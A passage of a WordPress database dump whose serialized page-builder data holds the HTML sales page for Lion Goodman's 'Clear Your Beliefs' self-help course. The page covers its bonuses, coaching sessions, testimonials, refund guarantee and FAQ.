practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1944, 2226, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:73097:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter" size-medium wp-image-1475" /></a></p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" 